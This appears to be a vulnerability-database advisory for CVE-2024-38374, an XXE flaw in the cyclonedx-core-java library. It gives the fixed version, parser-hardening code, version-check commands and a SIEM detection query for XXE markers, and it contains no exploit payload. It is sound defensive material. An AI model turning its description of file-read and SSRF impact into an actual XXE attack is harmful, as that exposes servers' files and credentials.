CVE-2024-38374
📋 TL;DR
This vulnerability allows attackers to perform XML External Entity (XXE) injection attacks when processing CycloneDX SBOM files in XML format. It affects applications using vulnerable versions of cyclonedx-core-java library to parse untrusted SBOMs. Attackers could read arbitrary files from the server or cause denial of service.
💻 Affected Systems
- cyclonedx-core-java
⚠️ Manual Verification Required
This CVE does not have specific version information in our database, so automatic vulnerability detection cannot determine if your system is affected.
Why? The CVE database entry doesn't specify which versions are vulnerable (no version ranges provided by the vendor/NVD).
🔒 Custom verification scripts are available for registered users. Sign up free to download automated test scripts.
- Review the CVE details at NVD
- Check vendor security advisories for your specific version
- Test if the vulnerability is exploitable in your environment
- Consider updating to the latest version as a precaution
⚠️ Risk & Real-World Impact
Worst Case
Complete server compromise through file disclosure, SSRF attacks, or denial of service via entity expansion attacks.
Likely Case
Unauthorized file read from the server filesystem, potentially exposing sensitive configuration files or credentials.
If Mitigated
Limited impact if input validation and proper XML parser configuration are in place.
🎯 Exploit Status
Standard XXE exploitation techniques apply. No authentication required if application processes untrusted XML input.
🛠️ Fix & Mitigation
✅ Official Fix
Patch Version: 9.0.4
Vendor Advisory: https://github.com/CycloneDX/cyclonedx-core-java/security/advisories/GHSA-683x-4444-jxh8
Restart Required: No
Instructions:
1. Update cyclonedx-core-java dependency to version 9.0.4 or later. 2. Update pom.xml or build.gradle to reference the fixed version. 3. Rebuild and redeploy your application.
🔧 Temporary Workarounds
Disable XML processing
allConfigure application to only accept SBOMs in JSON format instead of XML
Configure DocumentBuilderFactory securely
allManually configure XML parser with XXE protection before passing to cyclonedx-core-java
DocumentBuilderFactory dbf = DocumentBuilderFactory.newInstance();
dbf.setFeature("http://xml.org/sax/features/external-general-entities", false);
dbf.setFeature("http://xml.org/sax/features/external-parameter-entities", false);
dbf.setFeature("http://apache.org/xml/features/nonvalidating/load-external-dtd", false);
dbf.setXIncludeAware(false);
dbf.setExpandEntityReferences(false);
🧯 If You Can't Patch
- Implement strict input validation to reject XML SBOMs from untrusted sources
- Use network segmentation to isolate SBOM processing systems from sensitive data
🔍 How to Verify
Check if Vulnerable:
Check your project's dependency management file (pom.xml, build.gradle) for cyclonedx-core-java version < 9.0.4Check Version:
mvn dependency:tree | grep cyclonedx-core-java OR gradle dependencies | grep cyclonedx-core-javaVerify Fix Applied:
Verify cyclonedx-core-java version is 9.0.4 or higher in your dependency tree📡 Detection & Monitoring
Log Indicators:
- XML parsing errors with external entity references
- Unexpected file access attempts during SBOM processing
Network Indicators:
- Outbound connections from SBOM processing systems to unexpected destinations
SIEM Query:
source="application_logs" AND ("XXE" OR "external entity" OR "DOCTYPE") AND "cyclonedx"🔗 References
- https://github.com/CycloneDX/cyclonedx-core-java/pull/434
- https://github.com/CycloneDX/cyclonedx-core-java/pull/434/commits/ab0bc9c530d24f737970dbd0287d1190b129853d
- https://github.com/CycloneDX/cyclonedx-core-java/security/advisories/GHSA-683x-4444-jxh8
- https://github.com/CycloneDX/cyclonedx-core-java/pull/434
- https://github.com/CycloneDX/cyclonedx-core-java/pull/434/commits/ab0bc9c530d24f737970dbd0287d1190b129853d
- https://github.com/CycloneDX/cyclonedx-core-java/security/advisories/GHSA-683x-4444-jxh8
